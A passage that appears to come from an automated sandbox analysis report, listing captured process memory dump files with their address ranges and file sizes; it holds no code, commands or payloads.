                                                                                                                                                                              • memory/4000-297-0x00000000047E0000-0x00000000047E1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4000-299-0x0000000004A20000-0x0000000004A21000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4008-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4032-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4112-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4168-193-0x0000000000900000-0x0000000000A4A000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                1.3MB

                                                                                                                                                                              • memory/4168-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4168-196-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4.9MB

                                                                                                                                                                              • memory/4172-186-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4.6MB

                                                                                                                                                                              • memory/4172-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4172-183-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                36KB

                                                                                                                                                                              • memory/4192-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4208-159-0x0000000000BE0000-0x0000000000BE1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4208-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4208-168-0x00000000011E0000-0x00000000011E2000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                              • memory/4236-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4240-275-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4260-289-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4324-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4400-397-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4400-399-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                340KB

                                                                                                                                                                              • memory/4404-298-0x0000000004E60000-0x0000000004E61000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4404-292-0x0000000004E80000-0x0000000004E81000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4404-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4404-300-0x0000000004E80000-0x000000000537E000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                5.0MB

                                                                                                                                                                              • memory/4404-290-0x0000000005380000-0x0000000005381000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4404-281-0x0000000000510000-0x0000000000511000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4532-198-0x000001F092530000-0x000001F0925A1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                452KB

                                                                                                                                                                              • memory/4532-194-0x000001F0921D0000-0x000001F09221C000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                304KB

                                                                                                                                                                              • memory/4564-271-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4584-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4608-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4716-350-0x0000020822700000-0x000002082276E000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                440KB

                                                                                                                                                                              • memory/4716-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4716-351-0x0000020822770000-0x000002082283F000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                828KB

                                                                                                                                                                              • memory/4828-313-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4828-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4828-309-0x00000000057B0000-0x00000000057B2000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                              • memory/4828-294-0x0000000005980000-0x0000000005981000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4828-279-0x0000000000F20000-0x0000000000F21000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4904-411-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4908-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4940-273-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4940-352-0x0000000002D50000-0x0000000002D59000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                36KB

                                                                                                                                                                              • memory/4952-319-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4972-345-0x00000000001C0000-0x00000000001CA000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                40KB

                                                                                                                                                                              • memory/4972-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4976-274-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4976-277-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                80KB

                                                                                                                                                                              • memory/5004-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5028-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5028-316-0x0000000000400000-0x000000000067D000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                2.5MB

                                                                                                                                                                              • memory/5076-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                1.5MB

                                                                                                                                                                              • memory/5076-155-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                100KB

                                                                                                                                                                              • memory/5076-154-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                100KB

                                                                                                                                                                              • memory/5076-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                572KB

                                                                                                                                                                              • memory/5076-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5076-133-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                152KB

                                                                                                                                                                              • memory/5076-134-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                1.1MB

                                                                                                                                                                              • memory/5076-163-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                100KB

                                                                                                                                                                              • memory/5076-160-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                100KB

                                                                                                                                                                              • memory/5124-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5144-423-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5164-424-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5200-425-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5240-426-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5288-427-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5344-428-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5432-432-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5712-449-0x0000000000000000-mapping.dmp